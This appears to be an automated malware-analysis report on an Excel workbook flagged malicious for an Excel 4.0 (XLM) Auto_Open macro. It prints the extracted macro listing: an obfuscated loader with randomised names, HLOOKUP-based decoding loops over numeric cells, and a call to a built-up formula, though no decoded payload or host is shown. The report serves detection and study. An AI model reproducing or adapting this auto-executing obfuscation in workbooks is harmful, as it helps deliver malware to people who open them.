MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6548 bytes |
SHA-256: 579d7ff1984677579a5008b111e745349256f4311ab696e8304162d876b5a576 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - egZ
' 0018 26 LABEL : Cell Value, String Constant - aKTQLsmzJxI len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I184
' 0018 25 LABEL : Cell Value, String Constant - eiOYCMnHtX len=0
' 0018 23 LABEL : Cell Value, String Constant - HBXWBflP len=0
' 0018 20 LABEL : Cell Value, String Constant - HYnhH len=0
' 0018 24 LABEL : Cell Value, String Constant - JFCYCusEA len=0
' 0018 22 LABEL : Cell Value, String Constant - lGfJJUM len=0
' 0018 27 LABEL : Cell Value, String Constant - LiPZXlYQYCaT len=0
' 0018 22 LABEL : Cell Value, String Constant - OYmWwxE len=0
' 0018 20 LABEL : Cell Value, String Constant - pwXnZ len=0
' 0018 27 LABEL : Cell Value, String Constant - RjeLrOkqCjcE len=0
' 0018 21 LABEL : Cell Value, String Constant - rUkUHd len=0
' 0018 27 LABEL : Cell Value, String Constant - SEnEtPTGazdO len=0
' 0018 24 LABEL : Cell Value, String Constant - sVQROjdeY len=0
' 0018 22 LABEL : Cell Value, String Constant - TuQnGpm len=0
' 0018 23 LABEL : Cell Value, String Constant - uPyiDYHP len=0
' 0018 25 LABEL : Cell Value, String Constant - USnkKxGmIQ len=0
' 0018 27 LABEL : Cell Value, String Constant - wPvcSHNmdrJL len=0
' 0018 20 LABEL : Cell Value, String Constant - WvPeJ len=0
' 0018 23 LABEL : Cell Value, String Constant - XaVKmuXL len=0
' 0018 23 LABEL : Cell Value, String Constant - yJkTPqyo len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' egZ,T45,"",303.00000000000000000000
' egZ,T46,"",-823.00000000000000000000
' egZ,T47,"",-616.00000000000000000000
' egZ,T48,"",840.00000000000000000000
' egZ,T49,"",930.00000000000000000000
' egZ,T50,"",516.00000000000000000000
' egZ,I84,"SET.NAME("aKTQLsmzJxI",0+VALUE("0"))",""
' egZ,I88,"SET.NAME("HYnhH",aKTQLsmzJxI)",""
' egZ,I93,"SET.NAME("TuQnGpm",aKTQLsmzJxI)",""
' egZ,I97,"SET.NAME("USnkKxGmIQ",COUNTA(OYmWwxE))",""
' egZ,I101,"SET.NAME("uPyiDYHP",COUNTA(lGfJJUM))",""
' egZ,I105,[],""
' egZ,I108,"SET.NAME("JFCYCusEA","")",""
' egZ,I112,"HYnhH",""
' egZ,I116,"SET.NAME("SEnEtPTGazdO",HLOOKUP("*",OYmWwxE,HYnhH,FALSE))",""
' egZ,I121,"wPvcSHNmdrJL",""
' egZ,I123,"SET.NAME("eiOYCMnHtX",aKTQLsmzJxI)",""
' egZ,I126,[],""
' egZ,I128,"eiOYCMnHtX",""
' egZ,I133,"HBXWBflP",""
' egZ,I138,"XaVKmuXL",""
' egZ,I142,"WvPeJ",""
' egZ,I146,"SET.NAME("LiPZXlYQYCaT",VALUE(HLOOKUP("*",lGfJJUM,WvPeJ,FALSE)))",""
' egZ,I149,"RjeLrOkqCjcE",""
' egZ,I154,"JFCYCusEA",""
' egZ,I158,"TuQnGpm",""
' egZ,I160,NEXT(),""
' egZ,I165,"rUkUHd",""
' egZ,I169,[],""
' egZ,I173,"sVQROjdeY",""
' egZ,I175,NEXT(),""
' egZ,I180,RETURN(),""
' egZ,I209,"SET.NAME("yJkTPqyo",I84)",""
' egZ,I214,"OYmWwxE",""
' egZ,I217,"SET.NAME("lGfJJUM",R93C15)",""
' egZ,I221,"SET.NAME("sVQROjdeY",228)",""
' egZ,I225,"SET.NAME("pwXnZ",9)",""
' egZ,I227,yJkTPqyo(),""
' egZ,I228,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.